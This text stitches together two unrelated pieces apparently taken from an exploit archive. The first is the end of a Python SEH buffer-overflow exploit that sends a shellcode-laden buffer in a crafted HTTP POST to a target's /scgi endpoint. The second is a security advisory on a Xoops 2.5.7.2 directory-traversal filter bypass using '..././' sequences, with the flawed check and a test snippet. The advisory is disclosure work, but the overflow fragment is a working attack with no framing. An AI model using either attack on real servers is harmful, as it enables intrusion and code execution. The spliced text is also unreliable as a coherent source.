junk2="D"*9500                      #Junk at the end


buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)

 
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt


Vendor:
=============
xoops.org


Product:
================
Xoops 2.5.7.2


Vulnerability Type:
===========================
Directory Traversal Bypass


Vulnerability Details:
=====================

Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
However, they can be easily bypassed by simply issuing "..././" instead of
"../"


References:
http://xoops.org/modules/news/article.php?storyid=6757


Exploit Codes:
==============


In Xoops code in 'protector.php' the following check is made for dot dot
slash "../" in HTTP requests

/////////////////////////////////////////////////////////////////////////////////

if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
 $this->last_error_type = 'DirTraversal' ;
 $this->message .= "Directory Traversal '$val' found.\n" ;

////////////////////////////////////////////////////////////////////////////////

The above Xoops directory traversal check can be defeated by using
 ..././..././..././..././

you can test the theory by using example below test case by supplying
..././ to GET param.

$val=$_GET['c'];

if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
echo "traversal!";
}else{
echo "ok!" . $val;
}



Disclosure Date:
==================================
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure

==================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.